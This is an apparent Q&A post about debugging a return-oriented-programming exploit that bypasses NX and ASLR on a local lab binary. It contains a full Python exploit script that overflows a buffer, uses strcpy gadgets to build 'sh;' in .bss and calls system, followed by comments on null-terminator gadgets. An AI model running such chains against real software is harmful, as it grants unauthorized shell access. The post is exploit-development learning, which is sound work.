
I have one problem while doing an NX + ASLR bypass. I'm going through this tutorial step by step.

Everything is going well, I have prepared my exploit, just with another address and some small modifications:

#!/usr/bin/python

from struct import pack
from os import system

junk = 'A'*1036 #junk to offset to stored ret
strcpy = pack("<L", 0x8048310)
ppr = pack("<L", 0x080484ee) #pop pop ret

p = junk
p += strcpy
p += ppr
p += pack("<L", 0x0804a024) #bss
p += pack("<L", 0x08048162) # 's'
p += strcpy
p += ppr
p += pack("<L", 0x0804a025) #bss+1
p += pack("<L", 0x080480d8) # 'h'
p += strcpy
p += ppr
p += pack("<L", 0x0804a026) #bss+2
p += pack("<L", 0x0804852f) # ';'
p += pack("<L", 0x08048320) #system@plt
p += "AAAA"
p += pack("<L", 0x0804a024) #bss (now contains "sh;<junk>")

system("/tmp/a.out \""+p+"\"")

If I run it, nothing happens. But if I replace the address of "system@plt" with the address of system from libc, I get a segmentation fault.

p += pack("<L", 0xb7e4e104) #system from libc
p += "J" * 8 # sub esp,0xc
p += pack("<L", 0xdeadbeef) # exit
p += pack("<L", 0x0804a024) #bss (now contains "sh;<junk>")

system("/tmp/a.out \""+p+"\"")

./exploit.py and.... "Segmentation fault". I enabled core dumps to check what happened and I found this:

Program received signal SIGSEGV, Segmentation fault. 0x0804a024 in completed ()

This address contains:

(gdb) x/s 0x0804a024

0x804a024 : "sh;("

"sh;(" hm...? I would like to ask a few questions.

  1. Is that '(' the reason why I'm getting a segmentation fault instead of a shell?
  2. How can I remove/fix it? I tried different things, but without results.
  3. Why does using the address of "system@plt" not work? More precisely, why does it do nothing? In the SpiderLabs tutorial, however, everything works.

I know there are more ways to bypass ASLR + NX, but I'm curious what is going wrong.

core2dump
  • Try adding a 3rd strcpy gadget using a rop gadget that points to a null byte, so that bss+3 is set to \0, thus terminating the string before any junk. – Polynomial Sep 01 '15 at 20:15
  • How do I get a gadget that points to a null byte? Finding '\0' with the memstr option in ROPgadget seems not to be possible, or... – core2dump Sep 01 '15 at 21:03
  • Good point; strcpy won't copy a null, hence your problem in the first place. You could use a memcpy gadget instead, or look for a gadget that'll do something like pop eax; mov [eax+??], 0; ret (where eax could be any general purpose register, and the offset is any sensible value, or just zero). This would let you do an arbitrary memory write of null bytes. – Polynomial Sep 02 '15 at 08:42
  • Correct me if I'm wrong, but I don't think using memcpy is possible, because the only usable functions are system and strcpy. I have these gadgets available - http://pastebin.com/mSUKi3n4 .. Do you think there is one that could do the trick? I also toyed with the null byte again, but for a change I got a segmentation fault with '0' at the end. – core2dump Sep 02 '15 at 17:22
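As an added illustration (not part of the question or the comments): a small Python model of the three strcpy writes into .bss from the question, using constructed stand-ins for the bytes that follow each gadget-selected character in the binary. It reproduces the "sh;(" seen in gdb and shows what the extra copy from a NUL byte suggested in the comments changes. The source addresses are the ones from the question; the NUL-source address is a hypothetical placeholder.

```python
# Added example, not code from the question. Models C strcpy semantics
# (copy up to and including the first NUL) to show why overlapping
# single-character writes leave stray trailing bytes in .bss.

# Constructed stand-ins for what follows each selected character in the
# binary. The real neighbours differ; what matters is that strcpy keeps
# copying until it meets a NUL, so every byte before that NUL lands in .bss.
SOURCES = {
    0x08048162: b"s\x8b\x00",   # 's' from the question, one stray byte, NUL
    0x080480d8: b"h\x01\x00",   # 'h' from the question, one stray byte, NUL
    0x0804852f: b";(\x00",      # ';' from the question, then '(' and NUL
    0x08048000: b"\x00",        # hypothetical address of a lone NUL byte
}


def strcpy(mem, dst_off, src_addr):
    """Copy SOURCES[src_addr] into mem at dst_off, NUL included, like C strcpy."""
    data = SOURCES[src_addr]
    n = data.index(b"\x00") + 1
    mem[dst_off:dst_off + n] = data[:n]


def build_bss(writes, size=16):
    """Apply (offset-from-bss, source-address) strcpy calls to a zeroed .bss
    model and return the resulting C string (bytes up to the first NUL)."""
    mem = bytearray(size)
    for off, src in writes:
        strcpy(mem, off, src)
    return bytes(mem[:mem.index(b"\x00")])


# The three writes from the question: bss, bss+1, bss+2.
QUESTION_CHAIN = [(0, 0x08048162), (1, 0x080480d8), (2, 0x0804852f)]
# The comment's suggestion: a fourth copy whose source is a NUL byte,
# so bss+3 becomes the terminator.
FIXED_CHAIN = QUESTION_CHAIN + [(3, 0x08048000)]

if __name__ == "__main__":
    # The last write is ";(\0", so the stray '(' survives: system() is then
    # handed "sh;(", which /bin/sh rejects as a syntax error before running
    # anything, matching "nothing happens" in the first run.
    print(build_bss(QUESTION_CHAIN))  # b'sh;('
    print(build_bss(FIXED_CHAIN))     # b'sh;'
```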
